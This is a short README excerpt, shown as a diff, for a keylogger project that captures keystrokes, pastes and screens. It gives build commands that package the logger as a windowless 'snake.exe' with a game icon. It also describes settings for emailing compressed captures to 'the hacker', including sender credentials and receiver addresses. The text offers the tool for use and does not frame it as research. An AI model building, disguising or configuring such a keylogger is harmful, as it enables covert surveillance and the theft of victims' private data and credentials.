Zeal-L/Key-paste-screen-logger/README.md

 2. `python shell.py build_ext --inplace`
 3. `pyinstaller -F -w -n snake -i Snake.ico index.py`
 4. `cd dist/ && ./snake.exe `

+**Modifiable parameters**
+- `Packing_interval`
+  - How many the user does window switches are needed for the keylogger to compress all the information and send it to the hacker.
+- `email_sender` & `email_password`
+  - Mailboxes used to send packaged messages, If you use Google Mail, note that you must enable IMAP Access and "Control access to less secure apps" for your Gmial.
+- `receivers`
+  - Email address for receiving packaged information